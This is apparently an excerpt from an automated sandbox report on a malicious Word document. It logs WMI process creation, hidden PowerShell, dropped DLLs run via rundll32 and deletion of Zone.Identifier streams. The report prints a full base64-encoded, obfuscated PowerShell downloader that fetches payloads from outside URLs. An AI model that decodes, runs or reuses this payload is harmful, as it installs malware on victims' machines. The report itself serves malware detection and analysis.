BgAGMAYABUAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWQAnACsAJwBiACcAKwAnAHMAUgAnACsAKAAnAGcAMAA2ADQAJwArACcANgByAFkAYgBzACcAKwAnAFEAJwArACcAOQAnACkAKwAoACcAMAB4AG0AJwArACcAcgBxACcAKwAnAFkAYgAnACkAKwAnAHMAJwApACAAIAAtAFIARQBQAGwAYQBDAGUAIAAoACcAWQAnACsAJwBiAHMAJwApACwAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQASwAzADAAOQBxAHcAMQA9ACgAKAAnAFIAcQAnACsAJwByAG0AJwApACsAKAAnAGIAMgAnACsAJwA4ACcAKQApADsAIAAoACAATABzACAAIAB2AGEAcgBpAEEAYgBsAGUAOgBpADcAcgBQAHYAWgAgACkALgB2AGEATABVAGUAOgA6ACIAUwBFAGMAVQByAGkAYABUAFkAcABSAG8AYABUAE8AYwBgAG8AbAAiACAAPQAgACgAKAAnAFQAbABzACcAKwAnADEAJwApACsAJwAyACcAKQA7ACQATgBtAGgAMQB3AG0AZgA9ACgAKAAnAFgAMwBiADYAJwArACcAZwAnACkAKwAnAGEAJwArACcAbwAnACkAOwAkAE8AagB6AF8AdwBhADcAIAA9ACAAKAAnAE0AJwArACgAJwA4AGoAawBsACcAKwAnAHYANAAnACkAKQA7ACQAWABnAHQAdwB6AGcAaAA9ACgAKAAnAEMAYwAnACsAJwBrADAAaAAnACkAKwAnADEANgAnACkAOwAkAFEAcQBhAHkAdQA2AGgAPQAoACcAQgAnACsAKAAnAGUANgAnACsAJwBmACcAKQArACgAJwByACcAKwAnAHcAMAAnACkAKQA7ACQASgBkAGcAegBhADUAbwA9ACQASABPAE0ARQArACgAKAAnAHsAMAAnACsAJwB9AFIAZwAwADYANAA2AHIAJwArACcAewAnACsAJwAwAH0AUQA5ADAAJwArACcAeABtAHIAcQB7ACcAKwAnADAAfQAnACkAIAAtAEYAIAAgAFsAQwBoAEEAUgBdADkAMgApACsAJABPAGoAegBfAHcAYQA3ACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQATgAwADUAcQA1AHQANQA9ACgAJwBPACcAKwAoACcAXwAnACsAJwAzACcAKwAnAGUAMgBwAGYAJwApACkAOwAkAEcAawBoAG0AMQB0AGcAPQBuAGUAVwAtAE8AYgBgAGoAYABFAEMAVAAgAE4AZQBUAC4AVwBFAEIAQwBsAGkAZQBOAHQAOwAkAEoAawBkAHkAcwAwAG8APQAoACgAKAAoACcAaAB0ACcAKwAnAHQAJwArACcAcAA6AEoAJwArACcAKQAoADMAcwAyACkAJwApACkAKwAoACcAKAAnACsAJwBKACkAKAAzAHMAMgAnACsAJwApACcAKQArACgAKAAnACgAegBoACcAKwAnAG8AJwApACkAKwAoACcAbgBnAHMAJwArACcAaAAnACsAJwBpAHgAaQBuAGcAYwAnACsAJwBoAHUAYQAnACkAKwAoACcAbgAnACsAJwBnAC4AJwApACsAJwBjACcAKwAnAG8AbQAnACsAKAAoACcASgApACgAMwBzADIAJwArACcAKQAnACkAKQArACcAKAAnACsAJwB3AHAAJwArACgAJwAtACcAKwAnAGEAZABtAGkAbgBKACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAJwApACkAKwAoACgAJwAoAE8AVABtAEoAJwArACcAKQAoACcAKwAnADMAcwAnACsAJwAyACkAKABAACcAKQApACsAKAAnAGgAdAAnACsAJwB0ACcAK
                      Suspicious powershell command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEUAMwBTAHkAIAAgAD0AIABbAFQAWQBQAEUAXQAoACIAewA0AH0AewAzAH0AewAwAH0AewAxAH0AewA1AH0AewAyAH0AIgAtAGYAJwBNAC4ASQBvAC4ARAAnACwAJwBpAFIAZQAnACwAJwBUAE8AUgBZACcALAAnAFMAdABlACcALAAnAHMAeQAnACwAJwBDACcAKQAgADsAIAAgAFMAZQBUAC0ASQBUAEUATQAgAFYAQQBSAEkAYQBiAEwARQA6AGkANwBSAHAAVgB6ACAAIAAoAFsAVABZAFAARQBdACgAIgB7ADEAfQB7ADQAfQB7ADIAfQB7ADAAfQB7ADYAfQB7ADMAfQB7ADcAfQB7ADUAfQAiAC0AZgAgACcARQBUAC4AUwBlAFIAVgBpACcALAAnAFMAJwAsACcAVABFAG0ALgBOACcALAAnAEkATgBUACcALAAnAHkAUwAnACwAJwBBAG4AQQBnAEUAcgAnACwAJwBDAGUAUABvACcALAAnAE0AJwApACkAIAAgADsAJABYAHMAZQBqAGoAbwBvAD0AKAAnAE4AJwArACgAJwBhAHYAYwAnACsAJwBsAGcAJwApACsAJwB1ACcAKQA7ACQAUwBsAGYAcgAxAGcAcAA9ACQAUgBwAGIANQA2AHQANAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVQA5AG4AeQBiAGoAcwA7ACQAVwB3AHUAaABjAGYAcwA9ACgAKAAnAFUAXwBtACcAKwAnADQAawAnACkAKwAnAHAAcQAnACkAOwAgACAAKABnAEUAVAAtAHYAQQBSAEkAYQBCAGwAZQAgACAAZQAzAHMAWQAgAC0AdgBBAGwAVQBlAE8AbgAgACkAOgA6ACIAQwBSAGUAYQBUAEUARABpAHIAZQBgAGMAYABUAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWQAnACsAJwBiACcAKwAnAHMAUgAnACsAKAAnAGcAMAA2ADQAJwArACcANgByAFkAYgBzACcAKwAnAFEAJwArACcAOQAnACkAKwAoACcAMAB4AG0AJwArACcAcgBxACcAKwAnAFkAYgAnACkAKwAnAHMAJwApACAAIAAtAFIARQBQAGwAYQBDAGUAIAAoACcAWQAnACsAJwBiAHMAJwApACwAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQASwAzADAAOQBxAHcAMQA9ACgAKAAnAFIAcQAnACsAJwByAG0AJwApACsAKAAnAGIAMgAnACsAJwA4ACcAKQApADsAIAAoACAATABzACAAIAB2AGEAcgBpAEEAYgBsAGUAOgBpADcAcgBQAHYAWgAgACkALgB2AGEATABVAGUAOgA6ACIAUwBFAGMAVQByAGkAYABUAFkAcABSAG8AYABUAE8AYwBgAG8AbAAiACAAPQAgACgAKAAnAFQAbABzACcAKwAnADEAJwApACsAJwAyACcAKQA7ACQATgBtAGgAMQB3AG0AZgA9ACgAKAAnAFgAMwBiADYAJwArACcAZwAnACkAKwAnAGEAJwArACcAbwAnACkAOwAkAE8AagB6AF8AdwBhADcAIAA9ACAAKAAnAE0AJwArACgAJwA4AGoAawBsACcAKwAnAHYANAAnACkAKQA7ACQAWABnAHQAdwB6AGcAaAA9ACgAKAAnAEMAYwAnACsAJwBrADAAaAAnACkAKwAnADEANgAnACkAOwAkAFEAcQBhAHkAdQA2AGgAPQAoACcAQgAnACsAKAAnAGUANgAnACsAJwBmACcAKQArACgAJwByACcAKwAnAHcAMAAnACkAKQA7ACQASgBkAGcAegBhADUAbwA9ACQASABPAE0ARQArACgAKAAnAHsAMAAnACsAJwB9AFIAZwAwADYANAA2AHIAJwArACcAewAnACsAJwAwAH0AUQA5ADAAJwArACcAeABtAHIAcQB7ACcAKwAnADAAfQAnACkAIAAtAEYAIAAgAFsAQwBoAEEAUgBdADkAMgApACsAJABPAGoAegBfAHcAYQA3ACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQATgAwADUAcQA1AHQANQA9ACgAJwBPACcAKwAoACcAXwAnACsAJwAzACcAKwAnAGUAMgBwAGYAJwApACkAOwAkAEcAawBoAG0AMQB0AGcAPQBuAGUAVwAtAE8AYgBgAGoAYABFAEMAVAAgAE4AZQBUAC4AVwBFAEIAQwBsAGkAZQBOAHQAOwAkAEoAawBkAHkAcwAwAG8APQAoACgAKAAoACcAaAB0ACcAKwAnAHQAJwArACcAcAA6AEoAJwArACcAKQAoADMAcwAyACkAJwApACkAKwAoACcAKAAnACsAJwBKACkAKAAzAHMAMgAnACsAJwApACcAKQArACgAKAAnACgAegBoACcAKwAnAG8AJwApACkAKwAoACcAbgBnAHMAJwArACcAaAAnACsAJwBpAHgAaQBuAGcAYwAnACsAJwBoAHUAYQAnACkAKwAoACcAbgAnACsAJwBnAC4AJwApACsAJwBjACcAKwAnAG8AbQAnACsAKAAoACcASgApACgAMwBzADIAJwArACcAKQAnACkAKQArACcAKAAnACsAJwB3AHAAJwArACgAJwAtACcAKwAnAGEAZABtAGkAbgBKACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAJwApACkAKwAoACgAJwAoAE8AVABtAEoAJwArACcAKQAoACcAKwAnADMAcwAnACsAJwAyACkAKABAACcAKQApACsAKAAnAGgAdAAnACsAJwB0ACcAK
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEUAMwBTAHkAIAAgAD0AIABbAFQAWQBQAEUAXQAoACIAewA0AH0AewAzAH0AewAwAH0AewAxAH0AewA1AH0AewAyAH0AIgAtAGYAJwBNAC4ASQBvAC4ARAAnACwAJwBpAFIAZQAnACwAJwBUAE8AUgBZACcALAAnAFMAdABlACcALAAnAHMAeQAnACwAJwBDACcAKQAgADsAIAAgAFMAZQBUAC0ASQBUAEUATQAgAFYAQQBSAEkAYQBiAEwARQA6AGkANwBSAHAAVgB6ACAAIAAoAFsAVABZAFAARQBdACgAIgB7ADEAfQB7ADQAfQB7ADIAfQB7ADAAfQB7ADYAfQB7ADMAfQB7ADcAfQB7ADUAfQAiAC0AZgAgACcARQBUAC4AUwBlAFIAVgBpACcALAAnAFMAJwAsACcAVABFAG0ALgBOACcALAAnAEkATgBUACcALAAnAHkAUwAnACwAJwBBAG4AQQBnAEUAcgAnACwAJwBDAGUAUABvACcALAAnAE0AJwApACkAIAAgADsAJABYAHMAZQBqAGoAbwBvAD0AKAAnAE4AJwArACgAJwBhAHYAYwAnACsAJwBsAGcAJwApACsAJwB1ACcAKQA7ACQAUwBsAGYAcgAxAGcAcAA9ACQAUgBwAGIANQA2AHQANAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVQA5AG4AeQBiAGoAcwA7ACQAVwB3AHUAaABjAGYAcwA9ACgAKAAnAFUAXwBtACcAKwAnADQAawAnACkAKwAnAHAAcQAnACkAOwAgACAAKABnAEUAVAAtAHYAQQBSAEkAYQBCAGwAZQAgACAAZQAzAHMAWQAgAC0AdgBBAGwAVQBlAE8AbgAgACkAOgA6ACIAQwBSAGUAYQBUAEUARABpAHIAZQBgAGMAYABUAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWQAnACsAJwBiACcAKwAnAHMAUgAnACsAKAAnAGcAMAA2ADQAJwArACcANgByAFkAYgBzACcAKwAnAFEAJwArACcAOQAnACkAKwAoACcAMAB4AG0AJwArACcAcgBxACcAKwAnAFkAYgAnACkAKwAnAHMAJwApACAAIAAtAFIARQBQAGwAYQBDAGUAIAAoACcAWQAnACsAJwBiAHMAJwApACwAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQASwAzADAAOQBxAHcAMQA9ACgAKAAnAFIAcQAnACsAJwByAG0AJwApACsAKAAnAGIAMgAnACsAJwA4ACcAKQApADsAIAAoACAATABzACAAIAB2AGEAcgBpAEEAYgBsAGUAOgBpADcAcgBQAHYAWgAgACkALgB2AGEATABVAGUAOgA6ACIAUwBFAGMAVQByAGkAYABUAFkAcABSAG8AYABUAE8AYwBgAG8AbAAiACAAPQAgACgAKAAnAFQAbABzACcAKwAnADEAJwApACsAJwAyACcAKQA7ACQATgBtAGgAMQB3AG0AZgA9ACgAKAAnAFgAMwBiADYAJwArACcAZwAnACkAKwAnAGEAJwArACcAbwAnACkAOwAkAE8AagB6AF8AdwBhADcAIAA9ACAAKAAnAE0AJwArACgAJwA4AGoAawBsACcAKwAnAHYANAAnACkAKQA7ACQAWABnAHQAdwB6AGcAaAA9ACgAKAAnAEMAYwAnACsAJwBrADAAaAAnACkAKwAnADEANgAnACkAOwAkAFEAcQBhAHkAdQA2AGgAPQAoACcAQgAnACsAKAAnAGUANgAnACsAJwBmACcAKQArACgAJwByACcAKwAnAHcAMAAnACkAKQA7ACQASgBkAGcAegBhADUAbwA9ACQASABPAE0ARQArACgAKAAnAHsAMAAnACsAJwB9AFIAZwAwADYANAA2AHIAJwArACcAewAnACsAJwAwAH0AUQA5ADAAJwArACcAeABtAHIAcQB7ACcAKwAnADAAfQAnACkAIAAtAEYAIAAgAFsAQwBoAEEAUgBdADkAMgApACsAJABPAGoAegBfAHcAYQA3ACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQATgAwADUAcQA1AHQANQA9ACgAJwBPACcAKwAoACcAXwAnACsAJwAzACcAKwAnAGUAMgBwAGYAJwApACkAOwAkAEcAawBoAG0AMQB0AGcAPQBuAGUAVwAtAE8AYgBgAGoAYABFAEMAVAAgAE4AZQBUAC4AVwBFAEIAQwBsAGkAZQBOAHQAOwAkAEoAawBkAHkAcwAwAG8APQAoACgAKAAoACcAaAB0ACcAKwAnAHQAJwArACcAcAA6AEoAJwArACcAKQAoADMAcwAyACkAJwApACkAKwAoACcAKAAnACsAJwBKACkAKAAzAHMAMgAnACsAJwApACcAKQArACgAKAAnACgAegBoACcAKwAnAG8AJwApACkAKwAoACcAbgBnAHMAJwArACcAaAAnACsAJwBpAHgAaQBuAGcAYwAnACsAJwBoAHUAYQAnACkAKwAoACcAbgAnACsAJwBnAC4AJwApACsAJwBjACcAKwAnAG8AbQAnACsAKAAoACcASgApACgAMwBzADIAJwArACcAKQAnACkAKQArACcAKAAnACsAJwB3AHAAJwArACgAJwAtACcAKwAnAGEAZABtAGkAbgBKACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAJwApACkAKwAoACgAJwAoAE8AVABtAEoAJwArACcAKQAoACcAKwAnADMAcwAnACsAJwAyACkAKABAACcAKQApACsAKAAnAGgAdAAnACsAJwB0ACcAK
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10013BFB LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000B0BD push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007BCA push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006ACE92 push cs; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001ECE92 push cs; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0039CE92 push cs; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0020CE92 push cs; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001ACE92 push cs; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001BCE92 push cs; retf

                      Persistence and Installation Behavior:

                      barindex
                      Creates processes via WMIShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Bjbj\rqtl.dgqJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Bjbj\rqtl.dgq:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Frxh\ggkviq.cnk:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Zgwl\aiycp.wss:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Cqxs\necppp.cgm:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Oxpl\fwcrxow.muo:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Pnjy\rwrr.fge:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Qaqt\yasnhb.kgm:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Hudb\deul.ebq:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ohxf\pnwx.dib:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Jpux\rkm.xqv:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Oxtv\rmjj.sjq:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Pwzo\iducd.mjn:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Gfwk\bavnhqr.pvy:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Dbsb\hxixh.nee:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Yvvm\ving.mzt:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Puve\yoqqjfh.eoi:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
